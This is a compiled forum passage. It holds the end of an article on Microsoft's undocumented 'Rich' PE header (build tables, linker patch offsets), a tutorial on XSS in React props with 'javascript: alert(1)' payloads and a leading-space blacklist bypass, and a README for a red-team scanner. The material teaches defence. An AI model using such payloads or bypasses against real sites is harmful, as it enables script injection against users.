    42   count of assembler OBJ files originating from MASM 6.15

Microsoft Visual Studio 7.1 SP1

    ID   MEANING
    1    total count of imported DLL functions referenced; build number is always zero; same as in Linker versions 5.0 SP3 and 6.x
    15   count of assembler OBJ files originating from MASM 7.x
    90   linker; always present and always at end of list; use-count always 1
    93   Always seems to be present no matter how the executable was built, but doesn't appear to originate from @comp.id symbols (???)
    94   resource compiler; almost always 2nd to last in list (when RES file used) and use-count always 1
    95   count of C OBJ files from specific cl.exe compiler
    96   count of C++ OBJ files from specific cl.exe compiler

Not only do the ids change with each major linker release (sometimes with service packs too), but newer versions of the SDK's LIB files use different and higher id numbers for the same thing, such as the C and C++ compiler. So not only do the build numbers change with each SDK, but the id identifying the type of entry also changes. Unless the idea is to make the header difficult to interpret, the id may be meant to be combined with the build number to provide a unique compiler-that-built-SDK instance statistic which could be used to trace leaked or BETA versions of tools or SDKs.
The whole system might also double as another check system, where if the tool ids and reported build versions don't match known publicly released pairs, this would be another indication the entries in the list were tampered with. Without any official word from Microsoft, some of this is pure speculation. The good news is that if you are only interested in detecting modern versions of Visual Studio (7.x and up), the id member can be completely ignored! More information about detection is presented below.

WHEN DID MICROSOFT INTRODUCE THE "RICH"-ENABLED LINKER?

The short answer is in 1998, with Visual Studio 6.0 (LINK 6.x). The long answer is the final Service Pack for Visual Studio 5.0; that is, the version 5.10.7303 linker introduced with SP3 in 1997 was the first "Rich" capable linker. The catch was that the list this linker produced was practically empty because the compilers at the time (e.g. Visual C++ 5.x, MASM 6.12) did not yet emit the "@comp.id" symbol to the OBJ files. Not surprisingly, the LIB files that shipped with the product's SDK were also missing the "@comp.id" symbol. The result was a "Rich" structure with either a single entry for the imports, or with an additional entry to represent a compiled resource script.

If, however, you link a Visual C++ 6.0 OBJ file with the older 5.0 SP3 (5.10.7303) linker, you will get a proper "Rich" structure because the 6.0 OBJ file contains the "@comp.id" symbol with build information. The 6.0 OBJ files were, however, incompatible with the 5.0 SP2 and earlier linkers; if you attempted to link in any of these modules using the older linkers, you would run into error LNK1106: "invalid file or disk full: cannot seek to 0xXXXXXXXX". This is an indication that in 1997, Microsoft changed the OBJ file format. In summary, the Visual C++ 5.0 SP3 linker and the linker that would be released next with Visual C++ 6.0 both supported a new type of OBJ file.
Specifically, the OBJ files that would facilitate the generation of this new "Rich" structure.

CHANGELIST:

    PRODUCT VERSION: Visual Studio 97 (5.0) SP3
    YEAR: 1997
    CHANGE: First linker capable of producing "Rich" header and supporting new OBJ format to be released with the not-yet-public VC++ 6.0 compiler (cl.exe 12.x); however, compilers at the time did not yet support writing "@comp.id" to OBJ files, so the list had minimal information

    PRODUCT VERSION: Visual Studio 6.x
    YEAR: 1998
    CHANGE: Microsoft compilers, including Visual Basic, now support writing the "@comp.id" symbol to OBJ files; bundled SDK LIB files now contain "@comp.id" build information; as a result, executables built using the Visual C++ 6.0 compiler and linker now get the first "proper" "Rich" headers.

    PRODUCT VERSION: Visual Studio 7.0 .NET (2002)
    YEAR: 2002
    CHANGE: Linker now appends its own entry to the list and is always last; fortunately we now have a predictable entry that is retained in future versions

BUILD NUMBERS FOR DETECTION:

Before continuing further, I want to stress an important point. There is little preventing someone from either tampering with or completely falsifying the "Rich" header. While this structure may provide useful information for the majority of executables, other signature methods should be utilized in conjunction where accuracy is paramount. Some of these methods may include searching for specific patterns in the headers and/or analysis of the entry-point code. For example the Borland and Watcom linkers can be identified by specific patterns unique to each from their DOS stubs. The presence of a "Rich" header, or lack thereof, doesn't mean Microsoft's linker cannot be detected by other clues.

A typical version number for a Microsoft product consists of major and minor numbers (one byte each) followed by a 16-bit build number and sometimes another 16-bit sub-version number. Since we primarily have the build number for each "Rich" entry to go by, how might we distinguish a specific version of Visual Studio from this information?
There are at least 3 ways:

1. The MajorLinkerVersion and MinorLinkerVersion members of the PE's OptionalHeader can be combined with the last entry in the "Rich" list (if MajorLinkerVersion >= 7) to construct the full version of the linker. Once the linker is known, one can assume the version of Visual Studio including that linker was responsible for building the executable even if not all inputs came from this version.
2. The build numbers for each release of Visual Studio are almost completely unique, which allows build numbers to identify a specific version of the toolset used; that is, for ids besides the linker. The one exception I'm aware of is build number 50727. This build number was issued to public releases of both Visual Studio 2005 and 2012. As mentioned above, you might make the distinction by checking the PE MajorLinkerVersion and testing it for 8 and 11 respectively to at least determine the full version of the linker.
3. Because the entry type ids change between releases of Visual Studio, the id in combination with the build number can be used to uniquely identify a version of Visual Studio.

Based on the information above, if you want to detect versions of Visual Studio 7.0 and up, things couldn't be easier. If the MajorLinkerVersion in the PE's OptionalHeader is 7 or greater, indicating Visual Studio .NET 7.0 (2002) and up, the last entry in the list always represents the linker that built the module. If that build number corresponds to a known version of Visual Studio, you might consider it safe to assume the compiler is also from the same toolset.

As for versions of Visual Studio supporting the "Rich" structure prior to 7.0, the detection rules were a little different because no linker entry was written to the end of the "Rich" list. Perhaps Microsoft figured it was enough that the PE header contained the Major and Minor version for the linker and the build number was not important enough to include.
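The rule for linker 7.0 and up can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the function name, the tuple layout, and the linker version 7.10 used for the KERNEL32.DLL entries are hypothetical choices made for the example, and the entries are assumed to have already been decoded from the "Rich" list.

```python
from typing import List, Optional, Tuple

# One decoded "Rich" entry: (tool id, build number, use count), in file order.
# This tuple layout is an assumption made for the sketch.
RichEntry = Tuple[int, int, int]


def linker_version(major: int, minor: int,
                   entries: List[RichEntry]) -> Optional[str]:
    """Combine the PE linker version with the last "Rich" entry's build."""
    # Only linkers 7.0 and later append their own entry to the end of the list.
    if major < 7 or not entries:
        return None
    _tool_id, build, _uses = entries[-1]
    return f"{major}.{minor:02d}.{build}"


# Entries from the KERNEL32.DLL example; 7.10 is an assumed linker version.
kernel32 = [(1, 0, 394), (93, 4035, 3), (92, 4035, 1), (94, 4035, 1),
            (15, 4035, 5), (95, 4035, 221), (96, 4035, 4), (90, 4035, 1)]
print(linker_version(7, 10, kernel32))  # 7.10.4035
```

Returning None for pre-7.0 linkers keeps the caller honest: in that case there is no linker entry to read, so a different rule has to be applied.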
It is interesting to note that the id and build versions embedded within the publicly shipped SDK LIB files are those of non-public releases of Microsoft compilers; this makes sense because Microsoft builds its SDKs internally, but this happens to be a good thing for detection. This allows us to distinguish the SDK's compiler id/build pairs from those pairs that represent the compilers responsible for building the executable. In other words, if you know where the linker entry is and the entries that represent the SDK LIB files because they are not recognized public versions (see table below), the only thing left are the compiler entries we want to use for detection! You will then be able to determine the language used to build an executable, whether it be C, C++, MASM or all in combination in addition to the toolset version of each. All of this is assuming you want to use the build numbers alone for detection rather than hardcoding the differing tool ids per version of Visual Studio to combine with the build numbers. Going back to the KERNEL32.DLL example above, we can see the last entry's build number is 4035 which corresponds to one of the known public Microsoft 7.1 linkers. Using a lookup table, such as that shown below, applications can use this information to correlate [mostly] unique build numbers to known Microsoft Visual Studio toolsets. 
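As a rough sketch of such a lookup, the Python below maps a handful of build numbers to product names and handles the shared 50727 build by consulting the linker's major version. The dictionary holds only a few rows taken from this article's build table, and the names KNOWN_BUILDS and identify_build are hypothetical.

```python
from typing import Optional

# A few rows from the article's Visual Studio build table; not exhaustive.
KNOWN_BUILDS = {
    8168: "Visual Studio 6.0 (RTM, SP1 or SP2)",
    9782: "Visual Studio 6.0 SP6",
    9466: "Visual Studio 7.0 2002",
    3077: "Visual Studio 7.1 2003",
    6030: "Visual Studio 7.1 2003 SP1",
    21022: "Visual Studio 9.0 2008",
    30319: "Visual Studio 10.0 2010",
}


def identify_build(build: int, major_linker_version: int) -> Optional[str]:
    """Map a "Rich" build number to a toolset name, or None if unknown."""
    # Build 50727 was issued to both 2005 and 2012, so the PE header's
    # MajorLinkerVersion is needed to tell them apart.
    if build == 50727:
        if major_linker_version == 8:
            return "Visual Studio 8.0 2005"
        if major_linker_version == 11:
            return "Visual Studio 11.0 2012"
        return None
    return KNOWN_BUILDS.get(build)


print(identify_build(6030, 7))    # Visual Studio 7.1 2003 SP1
print(identify_build(50727, 11))  # Visual Studio 11.0 2012
```

An unknown build returns None rather than a guess, which fits the article's point that unrecognized id/build pairs usually belong to the SDK's LIB files rather than to a public compiler.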
MASM 6.x BUILDS

    BUILD   PRODUCT VERSION
    7299    6.13.7299
    8444    6.14.8444
    8803    6.15.8803

Visual Basic 6.0 BUILDS

    BUILD   PRODUCT VERSION
    8169    6.0 (also reported with SP1 and SP2)
    8495    6.0 SP3
    8877    6.0 SP4
    8964    6.0 SP5
    9782    6.0 SP6 (same as reported by VC++ but different id)

VISUAL STUDIO BUILDS

    BUILD                  PRODUCT VERSION          CL VERSION              LINK VERSION
    8168                   6.0 (RTM, SP1 or SP2)    12.00.8168              6.00.8168
    8447                   6.0 SP3                  12.00.8168              6.00.8447
    8799                   6.0 SP4                  12.00.8804              6.00.8447
    8966                   6.0 SP5                  12.00.8804              6.00.8447
    9044                   6.0 SP5 Processor Pack   12.00.8804              6.00.8447
    9782                   6.0 SP6                  12.00.8804              6.00.8447
    9466                   7.0 2002                 13.00.9466              7.00.9466
    9955                   7.0 2002 SP1             13.00.9466              7.00.9955
    3077                   7.1 2003                 13.10.3077              7.10.3077
    3052                   7.1 2003 Free Toolkit    13.10.3052              7.10.3052
    4035                   7.1 2003                 13.10.4035 (SDK/DDK?)
    6030                   7.1 2003 SP1             13.10.6030              7.10.6030
    50327                  8.0 2005 (Beta)          ?                       ?
    50727 (linkver 8.x)    8.0 2005                 14.00.50727.42 14.00.50727.762 SP1?
    21022                  9.0 2008                 15.00.21022
    30729                  9.0 2008 SP1             15.00.30729.01
    30319                  10.0 2010                16.00.30319
    40219                  10.0 2010 SP1            16.00.40219
    50727 (linkver 11.x)   11.0 2012                17.00.50727
    51025                  11.0 2012                17.00.51025
    51106                  11.0 2012 update 1       17.00.51106
    60315                  11.0 2012 update 2       17.00.60315
    60610                  11.0 2012 update 3       17.00.60610
    61030                  11.0 2012 update 4       17.00.61030
    21005                  12.0 2013                18.00.21005
    30501                  12.0 2013 update 2       18.00.30501
    40629                  12.0 2013 SP5            18.00.40629 SP5
    22215                  14.0 2015                19.00.22215 Preview
    23506                  14.0 2015 SP1            19.00.23506 SP1
    23824                  14.0 2015 update 2       (unverified)
    24215                  14.0 2015                19.00.24215.1 (unverified)

NOTE: The table above was compiled from various sources; it is not an exhaustive list.

BUILD NUMBERS DON'T ALWAYS MATCH REPORTED COMMAND LINE/VERSION RESOURCE VALUES!

As you can see, the build numbers don't always correspond to what is reported from the command line.
For example cl.exe for Visual C++ 6.0 reports version 12.00.8804 for Service Packs 4 thru 6, however the "@comp.id" value written to OBJ files is different for each service pack, such as 8799,8966,9044, and 9782 for SP4, SP5, SP5 (Processor Pack) and SP6 respectively. You can see the same pattern in Visual C++ 7.x. This allows for unique detection for each Service Pack. PATCHING THE MICROSOFT LINKER: Rather than using a tool (such as peupdate) to remove the "Rich" header on a per-executable basis, it is possible to "fix" the linker so that the "Rich" header is never written in the first place. It wasn't long between the "Rich" header's discovery gone public and the appearance of a linker patch to prevent the structure from being written to the executable. This is a cleaner solution than manually zeroing-out each executable produced, however a new patch is needed for each version of the linker. As an added bonus, patching reclaims the area originally occupied by the "Rich" header (usually offset 0x80) as the spot where the PE header will instead be placed. This can reduce the size of the executable depending on the file alignment value passed to the linker. In August of 2005, there was a PE tutorial written by Goppit that briefly describes using a tool called Signature Finder to patch the Linker. This is a simple GUI tool that when supplied the path to LINK.EXE, locates the RVA address of the CALL instruction for the routine which generates the "Rich" Header. Knowing where the "Rich" routine is invoked by the linker is the first step; how to patch is up to you. However the traditional patch method is to NOP-out the ADD instruction following the CALL. To do this, load LINK.EXE in a disassembler or debugger and navigate to the location reported by the tool (adding a 0x400000 base address to the reported RVA). 
If you have symbols loaded, you'll see disassembly similar to the following within the IMAGE::BuildImage() function:

    0045F0A5  E8 56 45 FC FF      call  ?UpdateCORPcons@@YGXXZ                 ; UpdateCORPcons(void)
    0045F0AA  55                  push  ebp                                    ; struct IMAGE *
    0045F0AB  E8 30 D2 01 00      call  ?UpdateSXdata@@YGXPAVIMAGE@@@Z         ; UpdateSXdata(IMAGE *)
    0045F0B0  8D 54 24 14         lea   edx, [esp+448h+lpMem]
    0045F0B4  52                  push  edx
    0045F0B5  55                  push  ebp
    0045F0B6  E8 45 A6 FF FF      call  ?CbBuildProdidBlock@IMAGE@@AAEKPAPAX@Z ; IMAGE::CbBuildProdidBlock(void**) <--- BUILDS the "Rich" Header
    0045F0BB  8B 8D 3C 02 00 00   mov   ecx, [ebp+23Ch]
    0045F0C1  03 C8               add   ecx, eax                               ; <--- NOP this out!
    0045F0C3  89 44 24 2C         mov   [esp+448h+var_41C], eax
    0045F0C7  89 8D 40 02 00 00   mov   [ebp+240h], ecx
    0045F0CD  FF 15 BC 12 40 00   call  ds:__imp___tzset

The "Rich" Header routine identified by the tool is named CbBuildProdidBlock(); we can now assume Microsoft internally refers to the "Rich" structure as the "Product ID Block". If the ADD instruction below it (address 0x45F0C1) is changed from bytes "03 C8" to "90 90" (NOPs), the linker still internally generates the structure, but because we've removed the instruction that advances the current file position, the PE header (which comes next in the image) overwrites the "Rich" structure. Problem solved, no information leak.

If you don't want to run the Signature Finder tool, below is a table with patch address information for all of the publicly-released 6.xx and 7.xx Microsoft linkers. The location is for the "ADD ECX,EAX" instruction (bytes "03 C8"). To perform the patch, replace the ADD instruction with two NOP bytes ("90 90"). This can be done with the bytepatch tool using the following command line:

    bytepatch -pa <address> link.exe 90 90

Replace <address> above with the value in the ADDRESS column below on whatever linker you are using.
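For readers without the bytepatch tool, the same edit can be sketched in Python. This is a hypothetical helper, not how bytepatch itself works: the names nop_out and va_to_file_offset are invented for the example, and the address-to-offset conversion assumes a 0x400000 image base with file offsets equal to RVAs, which is what the ADDRESS and FILE OFFSET columns in this article suggest for these particular linkers. Checking the original bytes first guards against patching the wrong linker build.

```python
def va_to_file_offset(address: int, image_base: int = 0x400000) -> int:
    """Convert a listed ADDRESS to a file offset (assumes offset == RVA)."""
    return address - image_base


def nop_out(image: bytes, offset: int, expected: bytes) -> bytes:
    """Return a copy of image with the expected bytes at offset set to NOPs."""
    found = image[offset:offset + len(expected)]
    if found != expected:
        # Refuse to patch if this is not the instruction we think it is.
        raise ValueError(
            f"expected {expected.hex()} at {offset:#x}, found {found.hex()}")
    nops = b"\x90" * len(expected)
    return image[:offset] + nops + image[offset + len(expected):]


# Usage sketch (paths are placeholders; work on a copy of the linker):
# data = open("link.exe", "rb").read()
# patched = nop_out(data, va_to_file_offset(0x45F0C1), bytes.fromhex("03C8"))
# open("link_patched.exe", "wb").write(patched)
```

Writing the result to a separate file keeps the original linker intact in case the patched copy misbehaves.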
    VERSION              SHIPPED WITH                MD5                               SIZE    ADDRESS   FILE OFFSET
    LINK.EXE 6.00.8168   MSVC 6.0 RTM,SP1,SP2        7b3d59dc25226ad2183b5fb3a0249540  462901  0x44551A  0x4551A
    LINK.EXE 6.00.8447   MSVC 6.0 SP3,SP4,SP5,SP6    24323f3eb0d1afa112ee63b100288547  462901  0x445826  0x45826
    LINK.EXE 7.00.9466   MSVC .NET 7.0 (2002) RTM    dbb5bf0ce85516c96a5cbdcc3d42a97e  643072  0x45CD82  0x5CD82
    LINK.EXE 7.00.9955   MSVC .NET 7.0 (2002) SP1    2042a0f45768bc359a5c912d67ad0031  643072  0x45CD32  0x5CD32
    LINK.EXE 7.10.3052   MSVC .NET Free Toolkit      8d7a69e96e4cc9c67a4a3bca1b678385  647168  0x45EA0F  0x5EA0F
    LINK.EXE 7.10.3077   MSVC .NET 7.1 (2003)        4677d4806cd3566c24615dd4334a2d4e  647168  0x45EA0F  0x5EA0F
    LINK.EXE 7.10.6030   MSVC .NET 7.1 (2003) SP1    59572e90b9fe958e51ed59a589f1e275  647168  0x45F0C1  0x5F0C1

Unfortunately, the Signature Finder tool only works with Microsoft linkers prior to and including Visual Studio .NET 7.1 (2003). RE Analysis of the tool indicates that it searches up to 4 possible linker signatures (all known linkers available at the time of the tool's release in 2004), so trying to patch a newer linker such as the one that shipped with MSVC .NET 8.0 (2005), results in an error. However, manually finding the location using a disassembler is not difficult. I received an e-mail from icestudent with a method he uses to manually patch each Microsoft linker release from 8.0 and up. Here is a break-down of this method:

- Ensure your symbol path is set correctly; then download symbols for the linker you want to patch; e.g.: symchk /v LINK.EXE
- Open LINK.EXE with IDA Pro.
- Open the imports window, locate "_tzset", and go to it.
- Open the references for "_tzset" (CTRL-X) and go to the "IMAGE::BuildImage" reference (or the "IMAGE::GenerateWinMDFile" for CLR executables).
- Around the "CALL _tzset" instruction, locate the "CALL IMAGE::CbBuildProdidBlock" instruction. In older versions of the linker it was closer and above "_tzset", in modern versions it is below and quite far.
- If you don't have symbols, check for all CALL instructions around "_tzset" and find the one where the referenced function begins with a call to "HeapAlloc"; this will be the "IMAGE::CbBuildProdidBlock()" function.
- After the "CALL IMAGE::CbBuildProdidBlock", you will see some code like "MOV reg, ...", "ADD reg, reg2", "MOV [mem], reg".
- NOP-out the second ADD instruction (or sometimes LEA) which is responsible for adjusting the PE offset in memory past the Rich signature.

If you don't use the method above, the table below contains the patch offsets for some post MSVC 7.x linkers. Thanks goes to icestudent for this information!

32-BIT LINK.EXE x86

    VERSION        OFFSET    ORIGINAL BYTES   PATCH BYTES
    8 SP1          0x6A382   03 D0            90 90
    9 RTM          0x6A20F   03 C8            90 90
    9 SP1          0x6BE7F   03 C8            90 90
    10 B1          0x6CF50   03 C8            90 90
    10 B2          0x75EED   03 D0            90 90
    10 CTP         0x6C26D   03 C8            90 90
    10 SP1         0x760AD   03 D0            90 90
    11 RTM U1      0x235BF   03 CE            90 90
    11 RTM         0x17AEF   03 CE            90 90
    vc18 CTP2      0x31920   03 CB            90 90
    vc18 PREVIEW   0x1B3D8   03 CF            90 90
    vc18 RC1       0x27B43   03 CF            90 90
    vc18 RTM       0x31168   03 CB            90 90

64-BIT LINK.EXE x64

    VERSION        OFFSET    ORIGINAL BYTES   PATCH BYTES
    8 RTM          0x8157A   93               8B
    8 SP1          0x80DAC   93               8B
    9 RTM          0x78205   93               8B
    9 SP1 KB       0x78CE1   8D 14 0E         90 90 90
    9 SP1          0x78CE5   93               8B
    10 B1          0x7A01F   93               8B
    10 B2          0x7A09D   93               8B
    10 SP1         0x7A06D   93               8B
    11 RTM U1      0x136B5   03 D0            90 90
    11 RTM         0x136B5   03 D0            90 90
    vc18 CTP2      0xE22A    03 D0            90 90
    vc18 PREVIEW   0x853D    03 D0            90 90
    vc18 RC1       0xE684    03 D0            90 90
    vc18 RTM       0xEF3A    03 D0            90 90

To patch using the offsets in the table above, use the following bytepatch command line, replacing <file-offset> and <patch-bytes> with the appropriate entry:

    bytepatch -a <file-offset> link.exe <patch-bytes>

CONSPIRACY THEORIES:

When the public first became aware of the "Rich" header, the obvious encryption of this structure of unknown information made a lot of people nervous and suspicious.
Because Microsoft never officially confirmed the existence of this structure, their lack of transparency made a lot of developers assume the worst. Here you can have an identical-source program built on two different machines and end up with a slightly different executable because the information contained within the "Rich" header was different. It is not surprising that people assumed Microsoft was embedding machine or otherwise personally identifiable information within the structure. These might include a NIC/MAC address, a CPU identifier, Windows registration information or even a unique GUID representing a particular installed instance of a Microsoft product or operating system. In reality, the only thing stored here are the build numbers for the Microsoft-specific tools responsible for a specific component in an executable module. The slightest difference in Visual Studio version, SDK version or 3rd party libraries used will cause an alteration of the "Rich" header. The PE/COFF specification defines a minimum file alignment of 512 bytes. Since this value leaves more than enough room for an executable's header section to fully contain the DOS and PE headers, there will always be leftover wasted space between the headers section and the subsequent section. Microsoft capitalized on this fact by inserting the "Rich" header in the padding space, since it wouldn't generally affect the final executable size one way or the other. To Microsoft's credit, the "Rich" header offers invaluable debugging statistics about how a given executable was built. Because the Visual C/C++ compiler and linker command lines are probably among the most complex command lines of any of Microsoft products to date, not to mention the different versions of those tools available and combinations of SDKs that can be used, a structure such as the "Rich" header being embedded within every executable could certainly save countless man hours in debugging complex build environment problems. 
Did I mention Microsoft's internal build environment is among the most complex in the world? If Microsoft's case against the author of a virus hinged on the virus being created by a particular version of Visual Studio that matched the version on a confiscated machine, I guess the "Rich" header could be used as evidence to prove this fact but probably not much more. There are other useful reasons Microsoft might want to bury such a secret "fingerprint" within executables. If Microsoft could prove which versions of certain libraries were employed, this would help them to assert intellectual property rights or even a redistribution license violation as they could distinguish between public, beta and pre-release versions. If companies used beta versions of Microsoft tools or libraries to release executables to the public outside of a specific time period, Microsoft would now have a way to find out. The "Rich" header could also help ensure publicly released benchmark tests were done fairly on properly built, Microsoft-sanctioned executables. These reasons could have been a bigger deal at the time the "Rich" header was invented than they are today. The problem was that Microsoft intentionally hid and encrypted this information. Since the structure doesn't officially exist, there isn't going to be an official way to disable it. Anyone who develops with Microsoft tools gets this structure crammed in their executable whether they like it or not. Failing to document this fact can be considered a questionable practice. However, once people realized Microsoft wasn't embedding personally identifiable information in their executables, the "Rich" header was no longer the hot topic it once was.
ORIGINS OF "RICH" AND "DANS" SEQUENCES: According to a 2012 post on Daniel Pistelli's RCE Cafe blog, information from two people who claimed to have worked on the Microsoft Visual C++ team said the word "Rich" likely originated from "Richard Shupak", a Microsoft employee who worked in the research department and had a hand in the Visual C++ linker/library code base. NOTE: Richard Shupak is listed as the author at the top of the file PSAPI.H in the Platform SDK. The PSAPI library (The NT "Process Status Helper" APIs) retrieves information about processes, modules and drivers. "DanS" was likely attributed to employee "Dan Spalding" who presumably ran the linker team. I can vouch for the fact that there was a "Dan Spalding" employee working on the Visual C++ team around the turn of the century. Apparently their initials also show up in the MSF/PDB format! CONCLUSION AND REFERENCES: The first known public information about this structure goes back to at least July 7th, 2004 from the article, Things They Didn't Tell You About MS LINK and the PE Header, a loose specification authored by "lifewire". I've archived the article here, because it is no longer available at one of the original links. While the article was brief, it was densely packed with useful details, such as the layout of the "Rich" structure and how the checksum key is calculated. It is not mentioned how the author came to know such information, but information like this is usually leaked or derived from reverse engineering. At the end of the article, he attributes the "Dan^" sequence as being a reference to Microsoft employee "Dan Ruder", but the sequence was actually and has always been "DanS", so I think this conclusion is incorrect. When I was writing the pelook tool and was looking to add minimal compiler signature detection, I initially stumbled upon Daniel Pistelli's excellent 2008 article, titled Microsoft's Rich Signature (undocumented). 
This article describes what he discovered while reverse engineering Microsoft's linker. Pistelli's research was independent of lifewire's 2004 article which was unknown to him at the time. Despite this, he arrived at the same conclusion. Pistelli's article was the first I'd heard of such a structure. I was surprised to learn of its existence and that it had been right under my nose all of those years. I was even more surprised that further information (official or unofficial) was not available. My goal in writing this article was to fill in some of the gaps of information not previously available, such as how far back Microsoft's linker had support for the "Rich" structure and how it changed between different versions of Visual Studio. Other links I found useful: A tutorial from 2010 that was based off of the original "lifewire" article. A posting on asmcommunity A posting on trendystephen <END OF ARTICLE> Sursa: http://bytepointer.com/articles/the_microsoft_rich_header.htm
  4. Ron Perris Apr 15 Avoiding XSS in React is Still Hard Introduction I’ve spent the last few weeks thinking about React from a secure coding perspective. Since React is a library for creating component based user interfaces, most of the attack surface is related to issues with rendering elements in the DOM. The smart folks over at Facebook have handled this by building automatic escaping into the React DOM library code. Built-in Escaping is Limited The escaping code in React DOM works great when you are passing a string value into [...children] . Notice the other two arguments to React.createElement type and [props], values passed into them are unescaped. // From https://reactjs.org/docs/react-api.html#createelement React.createElement( type, [props], [...children] ) Data Passed as Props is Unescaped When you pass data into a React element via props, the data is not escaped before being rendered into the DOM. This means that an attacker can control the raw values inside of HTML attributes. A classic XSS attack is to put a URL with a javascript: protocol into the href value of an anchor tag. When a user clicks on the anchor tag the browser will execute the JavaScript found in the href attribute value. // Classic XSS via anchor tag href attribute. <a href="javascript: alert(1)">Click me!</a> This classic XSS attack still works in React when rendering a component with React DOM. // Classic XSS via anchor tag href attribute in a React component. ReactDOM.render( <a href="javascript: alert(1)">Click me!</a>, document.getElementById('root') ) Mitigating XSS Attacks on React Props There are a few options for mitigating attacks on React components. You could do contextual escaping for the prop value. You would need a list of known bad values for each attribute and you would need to know which characters to escape to make the value benign. Historically this hasn’t gone very well. You could also try filtering, which also hasn’t gone very well in the past. 
For prop values you probably want to use validation. Here is a common attempt at avoiding XSS with blacklist style validation.

    const URL = require('url-parse')

    // Reject only the protocol we know to be dangerous.
    function isSafe(url) {
      if (url.protocol === 'javascript:') return false
      return true
    }

    isSafe(URL('javascript: alert(1)')) // Returns false
    isSafe(URL('http://www.reactjs.org')) // Returns true

This approach seems to be working, but as we will see shortly it will only prevent simple attacks that don’t attempt to evade the blacklist.

Validating Against a Blacklist is Hard

In the example above we are doing a lot of things right. We are using the npm module called url-parse to parse the URL instead of hand-rolling a solution. We are attempting to validate the url with an isolated reusable function, so that our security audits and remediation tasks will be easier. We are handling the failure case first in the function and using an early return strategy to handle a failure. Even so, it is usually a bad idea to use blacklists to enforce validation. Here we can defeat the isSafe function using our spacebar.

    const URL = require('url-parse')

    function isSafe(url) {
      if (url.protocol === 'javascript:') return false
      return true
    }

    // Note the leading space in the first input.
    isSafe(URL(' javascript: alert(1)')) // Returns true
    isSafe(URL('http://www.reactjs.org')) // Returns true

Reading npm Module Documentation is Hard (Not Joking)

The reason that isSafe(URL(' javascript: alert(1)')) doesn’t work as intended in our isSafe function is described in the documentation page for url-parse over on npm.

    baseURL (Object | String): An object or string representing the base URL to use in case url is a relative URL. This argument is optional and defaults to location in the browser.

So when we pass the string javascript: alert(1) with a leading space, I think url-parse assumes we are providing a relative URL and it is happy to assume the protocol from the browser’s location. In this case it believes the protocol for javascript: alert(1) is http:.
    const URL = require('url-parse')

    URL(' javascript: alert(1)').protocol // Returns http:

If we look further down in the documentation for url-parse on npm we will find this part.

    Note that when url-parse is used in a browser environment, it will default to using the browser's current window location as the base URL when parsing all inputs. To parse an input independently of the browser's current URL (e.g. for functionality parity with the library in a Node environment), pass an empty location object as the second parameter:

It tells us that if we pass an empty location object as the second parameter to url-parse, we can disable the behavior that causes all strings to be treated as having the browser’s location protocol as their protocol.

    const URL = require('url-parse')

    URL(' javascript: alert(1)', {}).protocol // Returns ""

With an empty object as the second argument we can see that we get an empty string back as the protocol for javascript: alert(1).

Fixing that Blacklist Function

Looking back at the isSafe(url) blacklist function, we can improve it by looking for empty strings in addition to the javascript: protocol.

    const URL = require('url-parse')

    function isSafe(url) {
      if (url.protocol === 'javascript:') return false
      if (url.protocol === '') return false
      return true
    }

    isSafe(URL('javascript: alert(1)', {})) // Returns false
    isSafe(URL('http://www.reactjs.org')) // Returns true

Oh yeah, this is a post about React XSS security. Let’s get back to that now. We can try to use our improved isSafe function to do some validation in a React component.
    import React, { Component } from 'react'
    import ReactDOM from 'react-dom'
    import URL from 'url-parse'

    class SafeURL extends Component {
      // Blacklist check: reject javascript: and unparseable (empty) protocols.
      isSafe(dangerousURL) {
        const url = URL(dangerousURL, {})
        if (url.protocol === 'javascript:') return false
        if (url.protocol === '') return false
        return true
      }

      render() {
        const dangerousURL = this.props.dangerousURL
        const safeURL = this.isSafe(dangerousURL) ? dangerousURL : null
        return <a href={safeURL}>{this.props.text}</a>
      }
    }

    ReactDOM.render(
      <SafeURL dangerousURL=" javascript: alert(1)" text="Click me!" />,
      document.getElementById('root')
    )

This example above is not injectable, maybe.

Whitelist Validation

I’ve never felt very comfortable with blacklist based solutions for security. It would be like if you heard a noise in your house at night and went downstairs to find an unfamiliar person standing in your living room, and in order to figure out if they belonged in your house you looked them up in a criminal offenders database. I prefer whitelist based solutions. I know who is supposed to be in my house.

    import React, { Component } from 'react'
    import ReactDOM from 'react-dom'
    import URL from 'url-parse'

    class SafeURL extends Component {
      // Whitelist check: allow only http: and https: URLs.
      isSafe(dangerousURL) {
        const url = URL(dangerousURL, {})
        if (url.protocol === 'http:') return true
        if (url.protocol === 'https:') return true
        return false
      }

      render() {
        const dangerousURL = this.props.dangerousURL
        const safeURL = this.isSafe(dangerousURL) ? dangerousURL : null
        return <a href={safeURL}>{this.props.text}</a>
      }
    }

    ReactDOM.render(
      <SafeURL dangerousURL=" javascript: alert(1)" text="Click me!" />,
      document.getElementById('root')
    )

Sursa: https://medium.com/javascript-security/avoiding-xss-in-react-is-still-hard-d2b5c7ad9412
  5. Red Team Arsenal

Red Team Arsenal is a web/network security scanner which can scan all of a company's online-facing assets and provide a holistic security view of any security anomalies. It's a closely linked collection of security engines to conduct/simulate attacks and monitor public-facing assets for anomalies and leaks. It's an intelligent scanner that detects security anomalies in all layer 7 assets and gives a detailed report, with integration support for Nessus. As companies continue to expand their footprint on the Internet via various acquisitions and geographical expansions, human-driven security engineering is not scalable; hence, companies need feedback-driven automated systems to keep up.

Installation

Supported Platforms

RTA has been tested on Ubuntu/Debian (apt-get based distros) as well as Mac OS. It should ideally work with any Linux-based distribution with mongo and python installed (install required python libraries from install/py_dependencies manually).

Prerequisites:

There are a few packages which are necessary before proceeding with the installation:

- Git client: sudo apt-get install git
- Python 2.7, which is installed by default in most systems
- Python pip: sudo apt-get install python-pip
- MongoDB: Read the official installation guide to install it on your machine.

Finally run python install/install.py

There are also optional packages/tools you can install (highly recommended):

Sursa: https://github.com/flipkart-incubator/RTA
